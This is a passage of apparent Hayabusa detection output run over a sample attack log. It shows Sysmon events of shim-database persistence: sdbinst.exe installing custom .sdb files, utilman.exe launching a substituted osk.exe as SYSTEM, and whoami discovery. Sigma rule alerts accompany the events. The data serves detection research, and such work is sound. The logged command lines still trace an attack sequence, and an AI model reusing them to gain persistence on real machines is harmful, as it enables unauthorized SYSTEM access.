winlogon.exe | LID: 0x33435 | PID: 2108 | PGUID: 365ABB72-55E8-5C91-0000-0010AEE50700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3956 | PGUID: 365ABB72-55E9-5C91-0000-00105BEA0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2104 | PGUID: 365ABB72-55E9-5C91-0000-00102EEB0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.172 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3956 | PGUID: 365ABB72-55E9-5C91-0000-00105BEA0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 
+2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2568 | PGUID: 365ABB72-55EB-5C91-0000-001076F60700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 612 | PGUID: 365ABB72-5638-5C91-0000-0010651A0800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3896 | PGUID: 365ABB72-5689-5C91-0000-0010543F0800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.953 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{7146b11e-ec78-4046-b854-9c9bdc68691e}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 3896 | PGUID: 
365ABB72-5689-5C91-0000-0010543F0800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.953 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.953 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.983 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim 
DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.104 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3848 | PGUID: 365ABB72-5689-5C91-0000-0010A1420800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3848 | PGUID: 365ABB72-5689-5C91-0000-0010A1420800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 4012 | PGUID: 365ABB72-568A-5C91-0000-0010A6450800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 100 | PGUID: 365ABB72-568A-5C91-0000-0010484A0800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 
+2019-03-20 05:52:26.364 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 100 | PGUID: 365ABB72-568A-5C91-0000-0010484A0800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 4072 | PGUID: 365ABB72-568A-5C91-0000-0010D24B0800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2476 | PGUID: 365ABB72-568D-5C91-0000-001061560800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft 
Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2548 | PGUID: 365ABB72-569F-5C91-0000-001012610800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.144 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{9aadf096-343f-4575-9514-4e5551e5ff19}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2548 | PGUID: 365ABB72-569F-5C91-0000-001012610800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.144 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.144 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.154 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.164 
+09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.294 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3088 | PGUID: 365ABB72-569F-5C91-0000-00105C640800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3088 | PGUID: 365ABB72-569F-5C91-0000-00105C640800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: 
winlogon.exe | LID: 0x33435 | PID: 3100 | PGUID: 365ABB72-569F-5C91-0000-00105F670800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3132 | PGUID: 365ABB72-569F-5C91-0000-0010036C0800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3140 | PGUID: 365ABB72-569F-5C91-0000-0010D96C0800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.484 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3132 | PGUID: 365ABB72-569F-5C91-0000-0010036C0800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 
+2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3312 | PGUID: 365ABB72-56A2-5C91-0000-0010D2770800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 3176 | PGUID: 365ABB72-5765-5C91-0000-001039030900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb"" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2848 | PGUID: 365ABB72-57EC-5C91-0000-001097810900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:21.014 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2848 | PGUID: 
365ABB72-57EC-5C91-0000-001097810900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:21.014 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:21.014 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:21.044 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:21.044 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:21.054 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:21.054 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim 
DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 384 | PGUID: 365ABB72-57F4-5C91-0000-0010F0910900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2892 | PGUID: 365ABB72-57F4-5C91-0000-001083920900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3700 | PGUID: 365ABB72-57F4-5C91-0000-001070930900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.815 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: 
C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 2604 | PGUID: 365ABB72-57F4-5C91-0000-0010BB9C0900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:31.860 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\system32\utilman.exe | PID: 3204 | PGUID: 365ABB72-57F7-5C91-0000-001008B30900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3204 | PGUID: 365ABB72-57F7-5C91-0000-001008B30900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""c:\osk.exe"" | Process: C:\osk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: utilman.exe /debug | LID: 0x3e7 | PID: 2128 | PGUID: 365ABB72-57FB-5C91-0000-00104FD40900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""c:\osk.exe"" | LID: 0x3e7 | PID: 2456 | PGUID: 365ABB72-5804-5C91-0000-001044DE0900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 
05:58:44.237 +09:00,PC01.example.corp,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Disc,Whoami Execution Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\wsqmcons.exe | Process: C:\Windows\System32\wsqmcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2772 | PGUID: 365ABB72-5851-5C91-0000-0010E1030A00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Process: C:\Windows\System32\schtasks.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\wsqmcons.exe | LID: 0x3e7 | PID: 2716 | PGUID: 
